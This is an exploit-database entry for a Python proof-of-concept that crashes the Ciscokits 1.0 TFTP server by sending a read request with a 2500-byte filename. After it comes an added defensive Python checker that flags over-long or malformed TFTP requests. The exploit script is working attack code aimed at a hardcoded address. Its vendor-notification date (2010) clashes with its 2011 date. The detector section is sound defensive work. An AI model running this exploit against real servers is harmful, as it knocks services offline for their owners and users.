Ciscokits 1.0 – TFTP Server File Name Denial of Service

  • Author: Craig Freyman
    Date: 2011-07-25
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17569/
    #!/usr/bin/python
    #Title: Ciscokits 1.0 TFTP Long Filename DoS
    #Author: Craig Freyman (@cd1zz)
    #Date: July 22, 2011
    #Software Link: http://www.certificationkits.com/tftpserver/tftpserver.zip
    #Tested on: Windows XP SP3
    #Vendor notified: July 22, 2010 - Vendor approved release of PoC on July 23, 2010. 
    #Notes: When a long file name read request is made the CPU will spike
    #and within about 20 seconds the TFTP service will crash.
    
    import socket,sys,time
    
    host = '192.168.133.128'
    port = 69
    
    try:
    	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except:
    	print "socket() failed"
    	sys.exit(1)
    
    crash = "\x41" * 2500
    
    mode = "netascii"
    files = "a"
    print "File name READ crash"
    #seems to only work on a READ command = x01
    pwned = "\x00\x01" + crash + "\0" + mode + "\0"
    s.sendto(pwned, (host, port))
    time.sleep(2)
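
For defenders, the request shape above (a read request, opcode 0x01, carrying a filename far longer than any real path) can be flagged before it reaches the service. The following is an added example, not part of the original PoC or of the vendor's software: it parses a TFTP request as laid out in RFC 1350 and reports over-long or malformed fields. The `MAX_FILENAME` and `MAX_REQUEST` limits and the sample payloads are assumptions chosen for illustration.

```python
import struct

OP_RRQ, OP_WRQ = 1, 2                      # RFC 1350 request opcodes
VALID_MODES = {"netascii", "octet", "mail"}
MAX_FILENAME = 255   # assumed policy limit; RFC 1350 itself sets none
MAX_REQUEST = 512    # assumed policy limit for a whole request datagram


def inspect_tftp_request(datagram):
    """Return a list of findings for one UDP payload addressed to port 69."""
    if len(datagram) < 2:
        return ["truncated: no opcode"]
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (OP_RRQ, OP_WRQ):
        return []                          # DATA/ACK/ERROR: not a request
    findings = []
    if len(datagram) > MAX_REQUEST:
        findings.append("oversized request: %d bytes" % len(datagram))
    # Layout: opcode | filename | 0x00 | mode | 0x00
    name, sep, rest = datagram[2:].partition(b"\0")
    if not sep:
        findings.append("filename not NUL-terminated")
        return findings
    if len(name) > MAX_FILENAME:
        findings.append("filename too long: %d bytes" % len(name))
    mode, sep, _ = rest.partition(b"\0")
    if not sep:
        findings.append("mode not NUL-terminated")
    elif mode.decode("ascii", "replace").lower() not in VALID_MODES:
        findings.append("unknown mode: %r" % mode[:16])
    return findings


# Constructed sample payloads for the check (never sent anywhere).
SAMPLES = {
    "normal read": b"\x00\x01startup-config\0octet\0",
    "long-name read": b"\x00\x01" + b"A" * 2500 + b"\0netascii\0",
    "data block": b"\x00\x03\x00\x01hello",
}

if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        print(label, "->", inspect_tftp_request(payload) or "ok")
```

The same length check belongs in the server's request handler, so that a request is rejected with a TFTP ERROR packet before the filename is copied or processed.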